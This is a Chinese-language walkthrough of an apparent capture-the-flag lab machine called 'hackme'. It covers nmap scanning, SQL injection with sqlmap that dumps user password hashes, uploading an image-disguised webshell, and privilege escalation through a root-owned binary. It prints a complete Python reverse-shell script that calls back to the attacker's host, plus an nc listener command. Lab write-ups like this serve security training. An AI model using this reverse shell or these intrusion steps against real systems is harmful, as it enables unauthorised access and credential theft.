信息收集

Nmap部分

存活扫描：

└─# nmap -sn 192.168.10.1/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 15:00 CST
Nmap scan report for 192.168.10.1 (192.168.10.1)
Host is up (0.00012s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.10.2 (192.168.10.2)
Host is up (0.00017s latency).
MAC Address: 00:50:56:E5:B1:08 (VMware)
Nmap scan report for 192.168.10.133 (192.168.10.133)  //靶机
Host is up (0.00033s latency).

端口扫描：

└─# nmap -sS -p- 192.168.10.133  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 15:01 CST
Nmap scan report for 192.168.10.133 (192.168.10.133)
Host is up (0.00055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:DC:16:77 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds

服务扫描：

└─# nmap -sSCV -p 22,80 -O --version-all  192.168.10.133
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
|   256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_  256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.34 (Ubuntu)
MAC Address: 00:0C:29:DC:16:77 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描：

发现文件上传的路径

Web页面：

首页是登陆页面，发现可以注册用户。

注册用户，并登录。发现是个查询页面：

SQL注入

发现注入点，字段为3，我们直接sqlmap一把梭。
 

继续跑，顺便把信息整理一下。

Database: webapphacking
[2 tables]
+-------+
| books |
| users |
+-------+
Database: webapphacking                                                              
Table: users
[7 entries]
+----+--------------+------------+----------------+---------------------------------------------+
| id | name         | user       | address        | pasword                                     |
+----+--------------+------------+----------------+---------------------------------------------+
| 1  | David        | user1      | Newton Circles | 5d41402abc4b2a76b9719d911017c592 (hello)    |
| 2  | Beckham      | user2      | Kensington     | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| 3  | anonymous    | user3      | anonymous      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| 10 | testismyname | test       | testaddress    | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 11 | superadmin   | superadmin | superadmin     | 2386acb2cf356944177746fc92523983            |
| 12 | test1        | test1      | test1          | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 13 | kitha        | kitha      | kitha          | e10adc3949ba59abbe56e057f20f883e (123456)   |
+----+--------------+------------+----------------+---------------------------------------------+

上传一句话木马

登录超级管理员 superadmin，，发现上传页面。可以上传图片马，，再用bp修改后缀即可。

蚁剑连接成功，，

反弹shell：

这里不能用nc，使用python反弹shell。

kali：nc -lvnp 2233
新建ftshell.py,内容如下，用蚁剑上传至目录并执行。
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.10.129",2233))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
蚁剑终端：python ftshell.py

提权：

www-data@hackme:/var/www/html/uploads$ cd /home 
cd /home
www-data@hackme:/home$ ls
ls
hackme
legacy
www-data@hackme:/home$ cd hackme
cd hackme
www-data@hackme:/home/hackme$ ls
ls
www-data@hackme:/home/hackme$ cd ..
cd ..
8#TT 1tt$D���o�N/home$ cd legacy
www-data@hackme:/home/legacy$ ls
ls
touchmenot
www-data@hackme:/home/legacy$ ./touchmenot
./touchmenot
id
uid=0(root) gid=33(www-data) groups=33(www-data)